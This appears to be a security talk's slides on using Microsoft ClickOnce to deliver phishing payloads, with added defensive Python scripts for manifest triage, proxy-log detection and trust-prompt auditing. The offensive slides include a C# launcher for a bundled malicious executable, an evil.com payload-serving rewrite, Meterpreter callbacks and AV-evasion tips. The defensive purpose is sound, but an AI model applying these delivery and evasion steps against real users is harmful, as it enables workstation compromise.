All You Need Is One - A ClickOnce Love Story
Introduction
• Ryan Gandrud ‒ Senior Security Consultant
• Penetration tester
• Phishing service lead
• Computer enthusiast
Overview
• ClickOnce?
• Phishing-phriendly pheatures
• Creating a malicious ClickOnce application
• Phishing server setup
• Issues and pitfalls
• Demo
• Prevention
ClickOnce WTF?
• ClickOnce – What is it?
 ‒ Executable wrapper
 ‒ Used to deploy installations
 ‒ Supports multiple deployment methods
ClickOnce Internals
• ProjectName.application
 ‒ Used to launch ClickOnce
 ‒ Contains the location of the manifest and application version information
• ProjectName.exe.config.deploy
 ‒ Contains application settings (e.g. connection strings, supported runtimes, etc.)
• ProjectName.exe.deploy
 ‒ The (potentially malicious) executable that will be run by a user
• ProjectName.exe.manifest
 ‒ Manifest file containing application version, .NET versions supported, permission level requested, and signatures for the other files
 ‒ Contains the file name for the executable
ClickOnce Certificate Signing
• Authenticode
 ‒ Microsoft cert-based signing technology
• Necessary to “acquire” a code-signing Authenticode certificate from a Certificate Authority (CA)
• Signing stages available
 ‒ Signed (CA)
 ‒ Self-signed (MakeCert.exe in .NET)
 ‒ Unsigned (No cert used)
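As an added example (not from the slides), the following Python script triages the two manifests described under ClickOnce Internals and checks the points raised on this slide and the previous one: where the deployment manifest says it came from, whether it carries an XML signature, whether it installs online-only, whether the application manifest requests Full Trust, and which executables it ships besides the entry point. The element and attribute names it looks for (deploymentProvider, dependentAssembly, publisherIdentity, Signature, PermissionSet Unrestricted, commandLine, file) are the ones ClickOnce manifests use; the two sample manifests, the hostname and the file names in them are constructed for this example.

```python
"""Added example (not part of the slides): triage a ClickOnce deployment.

Reads a deployment manifest (ProjectName.application) and the application
manifest (ProjectName.exe.manifest) and reports origin URL, signature
presence, online-only install, requested permission level and the
executables shipped. Both sample manifests below are constructed.
"""
import xml.etree.ElementTree as ET

def _local(tag):
    """Strip the XML namespace so elements match on local name only."""
    return tag.rsplit('}', 1)[-1]

def _find(root, name):
    """All elements in document order whose local name matches."""
    return [el for el in root.iter() if _local(el.tag) == name]

def triage_deployment_manifest(xml_text):
    root = ET.fromstring(xml_text)
    ident = _find(root, 'assemblyIdentity')        # first hit is the top-level identity
    deployment = _find(root, 'deployment')
    provider = _find(root, 'deploymentProvider')
    dependent = _find(root, 'dependentAssembly')
    publisher = _find(root, 'publisherIdentity')
    return {
        'name': ident[0].get('name') if ident else None,
        'version': ident[0].get('version') if ident else None,
        # install="false" is what "available online only" writes into the manifest
        'online_only': bool(deployment) and deployment[0].get('install', 'true').lower() == 'false',
        'codebase': provider[0].get('codebase') if provider else None,
        'app_manifest': dependent[0].get('codebase') if dependent else None,
        'publisher': publisher[0].get('name') if publisher else None,
        # an XML-DSig Signature element exists only if the manifest was signed
        'signed': bool(_find(root, 'Signature')),
    }

def triage_application_manifest(xml_text):
    root = ET.fromstring(xml_text)
    command = _find(root, 'commandLine')
    perms = _find(root, 'PermissionSet')
    files = [d.get('codebase') for d in _find(root, 'dependentAssembly')]
    files += [f.get('name') for f in _find(root, 'file')]
    return {
        'entry': command[0].get('file') if command else None,
        # Unrestricted="true" is the Full Trust request behind the elevation prompt
        'full_trust': any(p.get('Unrestricted', '').lower() == 'true' for p in perms),
        'files': [f for f in files if f],
    }

def findings(dep, app):
    """Review points a defender would raise about this package."""
    out = []
    if not dep['signed']:
        out.append('deployment manifest is unsigned')
    if dep['online_only']:
        out.append('online-only install: no Start Menu entry is created')
    if app['full_trust']:
        out.append('requests Full Trust (Unrestricted PermissionSet)')
    entry = (app['entry'] or '').lower()
    extra = [f for f in app['files'] if f.lower().endswith('.exe') and f.lower() != entry]
    if extra:
        out.append('ships executables besides the entry point: ' + ', '.join(extra))
    return out

# Constructed sample manifests (hostname, paths and sizes are made up).
SAMPLE_DEPLOYMENT_MANIFEST = """<asmv1:assembly manifestVersion="1.0"
 xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2">
 <assemblyIdentity name="Demo.application" version="1.0.0.0" xmlns="urn:schemas-microsoft-com:asm.v1"/>
 <deployment install="false" mapFileExtensions="true">
  <deploymentProvider codebase="http://evil.example/abc123/Demo.application"/>
 </deployment>
 <dependency>
  <dependentAssembly dependencyType="install" codebase="Application Files\\Demo_1_0_0_0\\Demo.exe.manifest">
   <assemblyIdentity name="Demo.exe" version="1.0.0.0"/>
  </dependentAssembly>
 </dependency>
</asmv1:assembly>"""

SAMPLE_APPLICATION_MANIFEST = """<asmv1:assembly manifestVersion="1.0"
 xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2">
 <assemblyIdentity name="Demo.exe" version="1.0.0.0" type="win32"/>
 <entryPoint>
  <commandLine file="Demo.exe" parameters=""/>
 </entryPoint>
 <trustInfo><security><applicationRequestMinimum>
  <PermissionSet Unrestricted="true" ID="Custom" SameSite="site"/>
  <defaultAssemblyRequest permissionSetReference="Custom"/>
 </applicationRequestMinimum></security></trustInfo>
 <dependency>
  <dependentAssembly dependencyType="install" codebase="Demo.exe"/>
 </dependency>
 <file name="ClickOnceInc.exe" size="73728"/>
 <file name="Demo.exe.config" size="189"/>
</asmv1:assembly>"""

if __name__ == '__main__':
    dep = triage_deployment_manifest(SAMPLE_DEPLOYMENT_MANIFEST)
    app = triage_application_manifest(SAMPLE_APPLICATION_MANIFEST)
    for point in findings(dep, app):
        print('-', point)
```

On a real package, point the two functions at the downloaded ProjectName.application and the ProjectName.exe.manifest it references (the .deploy suffix on the other files is only a web-server convenience and is dropped by ClickOnce on install). Note that the script only detects the presence of a Signature element; validating the signature chain is a separate step.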
ClickOnce Trust Architecture
• Based on different execution source zones
• Allows permitted applications to elevate privileges automatically (Trusted Sites) or through prompting the user
• Prompting levels are controlled by the following registry key
 ‒ \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel
ClickOnce Trust Architecture (cont.)
• These are features:
 ‒ "But the most important new feature when it comes to security is … the end user can elevate permissions without the help of an administrator"
 ‒ "If the application permissions don't exceed policy permissions, the application downloads and runs without asking the user any trust questions."
 ‒ "If the application needs more permissions than what's granted by policy, the user is asked if he wants to trust that application and elevate permissions... If the user clicks Run, the application is put into the Application Trust List and is downloaded and started."
ClickOnce Trust Architecture (cont.)
• Original trust zone configuration during ClickOnce Beta
ClickOnce Trust Architecture (cont.)
• Modified trust architecture now in production
• Unsigned applications from Internet zone now prompt user to elevate permissions
Owning With a Click
• Why use ClickOnce application?
 ‒ Supported on all modern Windows operating systems since it relies on .NET
 ‒ .NET supports backwards compatibility within its own major version
 ‒ Dead simple to write (C#)
 ‒ Public browser exploits are highly version specific and, more often than not, crash the victim’s browser
Owning With a Click (cont.)
• Originally meant to be deployed using Windows Internet Explorer
 ‒ Supported by IE 6.0+
 ‒ Supported by Firefox and Chrome using third party addons (.NET 3.5+)
• Minimizes user interaction
• Delivers malicious code through multiple options
 ‒ It’s a .NET project – write your own
 ‒ Include malicious executable as a resource
Payloads
• Roll your own payload
 ‒ Original vector
 ‒ Flagged by AV
• Standard Metasploit payload
 ‒ Reverse_HTTPS returned broken shells
Payloads (cont.)
• Powershell
 ‒ Justin@sixdub follow up
  • Great explanation about using PowerShell commands within ClickOnce
 ‒ Pros:
  • Powershell command runs in memory – never touches disk
  • AV evasion
 ‒ Cons:
  • Difficulty in changing payloads
  • ClickOnce is already on disk
Payloads (cont.)
• Veil-Evasion
 ‒ Pros:
  • Payloads written in different languages
  • Encrypted payloads
 ‒ Cons:
  • Static “random” Meterpreter callback
  • Issue with how Metasploit handles stagers
  • Fixed with release of stageless Meterpreter
Payloads (cont.)
• Problem:
 ‒ Static Meterpreter callbacks from targets
• Solution?:
 ‒ Dynamically generating individualized Veil payloads
Creating a ClickOnce Application
• Visual Studio is used to create ClickOnce applications
 ‒ The community edition of Visual Studio 2015 supports ClickOnce publishing
• Start a new console application project within Visual Studio
Creating a ClickOnce Application (cont.)
• Using C# in .NET, create a new process that launches your included executable (ClickOnceInc.exe)

```csharp
static class Program
{
    static void Main()
    {
        // Starting a new process executing the malicious exe
        System.Diagnostics.Process p = new System.Diagnostics.Process();
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = false;
        p.StartInfo.FileName = "ClickOnceInc.exe";
        p.Start();
    }
}
```
Creating a ClickOnce Application (cont.)
• Ensure that your application uses the correct version of .NET so the application runs properly.
 ‒ Windows 7 – 3.5.1 + 2.0
 ‒ Windows 8 – 4.5
 ‒ Windows 8.1 – 4.5.1
 ‒ Windows 10 – 4.6
• Here, .NET 4.0 was chosen by navigating to the Application tab on the left, and selecting the Target Framework from the dropdown.
Creating a ClickOnce Application (cont.)
• Include your malicious binary in the project by clicking and dragging it over your Solution Explorer
Creating a ClickOnce Application (cont.)
• In the Properties of the application under Publish:
 ‒ Ensure the Install Mode is set to “available online only”
  • This prevents the application from showing up in the Start Menu
 ‒ Clicking the Application Files… button
  • Exclude the hash for the ClickOnceInc.exe
  • Dynamic payload generation changes the hash
Creating a ClickOnce Application (cont.)
• Clicking the Publish button, follow the wizard to publish the ClickOnce application to your local drive
• Should create multiple files/directories
 ‒ Application Files directory
 ‒ Demo.application
 ‒ Publish.htm
 ‒ Setup.exe
Server Setup
• Web server
 ‒ Kali (2.0) with Veil, Metasploit, and Apache
• Apache mod_rewrite
 ‒ GET evil.com?u={ID} -> evil.com/{ID}/evil.application
 ‒ Combined with dynamic Veil payloads, allowed easy analytics and post-mortem data gathering.
Callback Listener
• Metasploit listener
 ‒ Phishing scenario – targets are workstations
 ‒ Most likely have outbound http access
 ‒ Limited window of engagement
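The server setup above produces a recognisable fetch sequence on the client side, which is what a defender can look for. As an added example (not from the slides), the following Python pass over web-proxy logs picks out the sequence a browser-launched ClickOnce application produces: the .application deployment manifest followed by the .manifest and .deploy files from the same host, and separates a completed launch from a lone manifest fetch (blocked, declined, or still pending). The log lines, hostnames and client addresses are constructed for this example, and the 'timestamp client method url status' line format is an assumption; adapt parse_line to your proxy's format.

```python
"""Added example (not part of the slides): ClickOnce delivery in proxy logs.

Groups successful fetches of ClickOnce files by (client, host) and reports
whether the whole launch sequence was seen. Log lines are constructed in a
simple 'timestamp client method url status' format.
"""
from urllib.parse import urlsplit

CLICKONCE_EXTS = ('.application', '.manifest', '.deploy')

def parse_line(line):
    """Split one constructed-format log line into a dict, or None if malformed."""
    parts = line.split()
    if len(parts) < 5:
        return None
    ts, client, method, url, status = parts[:5]
    return {'ts': ts, 'client': client, 'method': method, 'url': url, 'status': status}

def clickonce_kind(url):
    """Return the ClickOnce file type of a URL (by path extension), or None."""
    path = urlsplit(url).path.lower()
    for ext in CLICKONCE_EXTS:
        if path.endswith(ext):
            return ext
    return None

def find_clickonce_activity(lines):
    """Return a sorted list of (client, host, verdict, first_seen_timestamp)."""
    seen = {}   # (client, host) -> {'kinds': set of extensions, 'first': timestamp}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec['status'] != '200':
            continue        # only completed downloads matter here
        kind = clickonce_kind(rec['url'])
        if kind is None:
            continue
        key = (rec['client'], urlsplit(rec['url']).hostname)
        entry = seen.setdefault(key, {'kinds': set(), 'first': rec['ts']})
        entry['kinds'].add(kind)
    results = []
    for (client, host), entry in sorted(seen.items()):
        kinds = entry['kinds']
        if '.application' in kinds and ('.manifest' in kinds or '.deploy' in kinds):
            verdict = 'ClickOnce application launched'      # full chain observed
        elif '.application' in kinds:
            verdict = 'deployment manifest fetched only'    # blocked, declined or pending
        else:
            verdict = 'manifest/deploy files without .application'
        results.append((client, host, verdict, entry['first']))
    return results

# Constructed sample log: one client completes the chain, another only fetches a manifest.
SAMPLE_LOG = """\
2015-10-12T14:03:20Z 10.1.2.3 GET http://evil.example/?u=abc123 200
2015-10-12T14:03:22Z 10.1.2.3 GET http://evil.example/abc123/Demo.application 200
2015-10-12T14:03:23Z 10.1.2.3 GET http://evil.example/abc123/Application%20Files/Demo_1_0_0_0/Demo.exe.manifest 200
2015-10-12T14:03:24Z 10.1.2.3 GET http://evil.example/abc123/Application%20Files/Demo_1_0_0_0/Demo.exe.deploy 200
2015-10-12T14:03:24Z 10.1.2.3 GET http://evil.example/abc123/Application%20Files/Demo_1_0_0_0/ClickOnceInc.exe.deploy 200
2015-10-12T14:05:01Z 10.1.2.9 GET http://intranet.corp.example/tools/Demo.application 200
2015-10-12T14:06:40Z 10.1.2.9 GET http://www.example/index.html 200
"""

if __name__ == '__main__':
    for client, host, verdict, first in find_clickonce_activity(SAMPLE_LOG.splitlines()):
        print(f'{first} {client:<10} {host:<24} {verdict}')
```

Because the deployment manifest is fetched before any trust prompt is shown, the "manifest fetched only" verdict is the earlier and noisier signal; the full chain is the one worth alerting on, and the host it points at is the one to block.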
Pitfalls
• Outdated packages / dependencies
 ‒ Veil, Python, Wine.
• Signing restrictions
 ‒ No signing allowed with dynamic payloads
• No easy way to use mage.exe on Linux
 ‒ Self-signed certs are only marginally better
Cleanup
• ClickOnce install directory:
 ‒ %LOCALAPPDATA%\Apps\2.0\{machine-specific}\{machine-specific}\{obfuscated-app-name}
  • C:\Users\Bob\AppData\Local\Apps\2.0\F3RBL2XD.32Y\Z3R2E8LL.92S\{app-folder}
Cleanup
• Add/Remove Programs
• Delete relevant AppData folder
• Nuke everything:
 ‒ rundll32 dfshim CleanOnlineAppCache
 ‒ Note: This will clear the entire online application cache.
 ‒ No need for elevated privileges, AppCaches are user-specific.
Demo
• Client:
 ‒ Windows 10
• Server (hack.me):
 ‒ Kali 2.0 running Apache to serve file
 ‒ Metasploit listener running to catch callback
Preventative Measures
• Typical Anti-Phishing Techniques In Place
 ‒ User education
 ‒ Endpoint protection
 ‒ Least privileged configurations
• Helpful, but not effective enough
Preventative Measures
• ClickOnce-Specific Techniques
 ‒ Code Access Security
  • ClickOnce applications can specify a “permissions level”
  • Default: Full Trust – Requires prompt for elevation
Preventative Measures
• Disabling Trust Prompt
 ‒ \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel
 ‒ Trust prompt is controlled by zone
  • Untrusted Sites
  • Internet
  • My Computer
  • Local Intranet
  • Trusted Sites
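An added example (not from the slides) for auditing the registry key above: a Python script that reads the per-zone PromptingLevel values on Windows (via winreg) or, on any other system, audits a constructed set, and flags the Internet and Untrusted Sites zones when they are set to Enabled, the setting that lets an unsigned application from a phishing link reach the trust prompt at all. The zone value names (MyComputer, LocalIntranet, Internet, TrustedSites, UntrustedSites), the three levels (Enabled, Disabled, AuthenticodeRequired) and the defaults applied to missing values are taken from Microsoft's ClickOnce trust-prompt documentation; the names SAMPLE_VALUES and HARDENED_VALUES and the verdict wording are this example's own.

```python
"""Added example (not part of the slides): audit ClickOnce trust-prompt levels.

The TrustManager\\PromptingLevel key holds one string value per zone, each
Enabled, Disabled or AuthenticodeRequired. Live values are read on Windows;
elsewhere a constructed sample is audited.
"""
ZONES = ('MyComputer', 'LocalIntranet', 'Internet', 'TrustedSites', 'UntrustedSites')
VALID_LEVELS = {'Enabled', 'Disabled', 'AuthenticodeRequired'}
# Defaults Microsoft documents for values absent from the registry.
DOCUMENTED_DEFAULTS = {'MyComputer': 'Enabled', 'LocalIntranet': 'Enabled', 'Internet': 'Enabled',
                       'TrustedSites': 'Enabled', 'UntrustedSites': 'Disabled'}
# Zones a phished link lands in; a prompt here is the exposure the slides describe.
EXPOSED_ZONES = ('Internet', 'UntrustedSites')
REGISTRY_PATH = r'SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel'

def audit_prompting_levels(values):
    """Return [(zone, effective_level, verdict)] for a zone -> level mapping."""
    results = []
    for zone in ZONES:
        level = values.get(zone, DOCUMENTED_DEFAULTS[zone])
        if level not in VALID_LEVELS:
            verdict = 'INVALID: unrecognised value, treat as misconfiguration'
        elif zone in EXPOSED_ZONES and level == 'Enabled':
            verdict = 'WEAK: unsigned apps from this zone can prompt the user to elevate'
        elif level == 'Enabled':
            verdict = 'prompt allowed (expected for local and trusted zones)'
        elif level == 'AuthenticodeRequired':
            verdict = 'ok: only apps signed with a trusted certificate get a prompt'
        else:
            verdict = 'ok: trust prompt disabled for this zone'
        results.append((zone, level, verdict))
    return results

def weak_zones(values):
    """Zones whose setting still lets unsigned, unsolicited apps reach the prompt."""
    return [zone for zone, _, verdict in audit_prompting_levels(values) if verdict.startswith('WEAK')]

def read_registry_values():
    """Read the live HKLM values on Windows; return None on other platforms."""
    try:
        import winreg
    except ImportError:
        return None
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, REGISTRY_PATH) as key:
            for zone in ZONES:
                try:
                    values[zone] = winreg.QueryValueEx(key, zone)[0]
                except FileNotFoundError:
                    pass      # value absent: documented default applies
    except FileNotFoundError:
        pass                  # key absent: all documented defaults apply
    return values

# Constructed sample: the production configuration the slides describe, where the
# Internet zone still prompts for unsigned applications.
SAMPLE_VALUES = dict(DOCUMENTED_DEFAULTS)
# The same machine after hardening: Internet zone prompts only for CA-signed apps.
HARDENED_VALUES = dict(SAMPLE_VALUES, Internet='AuthenticodeRequired', UntrustedSites='Disabled')

if __name__ == '__main__':
    live = read_registry_values()
    source = 'live registry' if live is not None else 'constructed sample'
    for zone, level, verdict in audit_prompting_levels(live if live is not None else SAMPLE_VALUES):
        print(f'{source}: {zone:<15} {level:<21} {verdict}')
```

Setting Internet to AuthenticodeRequired keeps the prompt for applications signed by a certificate the machine already trusts, which preserves legitimate ClickOnce deployments while removing the prompt the phishing scenario depends on; Disabled goes further and blocks the zone outright.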
Preventative Measures
• Windows 8/10
 ‒ SmartScreen Filter
  • Enabled by default
  • Default ‘OK’ action results in application not running
Questions?
More Information / References
• Alice in Warningland: A Large-Scale Field Study of Browser Security Warning Effectiveness
 ‒ Devdatta Akhawe, University of California, Berkeley
 ‒ Adrienne Porter Felt, Google, Inc.
• http://leastprivilege.com/2006/02/18/beware-be-aware-of-clickonce-default-settings/
• https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx
• https://msdn.microsoft.com/en-us/library/cc176048(v=vs.90).aspx
• https://msdn.microsoft.com/en-us/library/ee308453.aspx
• https://robindotnet.wordpress.com/2013/02/24/windows-8-and-clickonce-the-definitive-answer-2/
• https://blog.netspi.com/bypassing-av-with-veil-evasion/
• https://github.com/rapid7/metasploit-framework/issues/4895
• http://www.sixdub.net/?p=555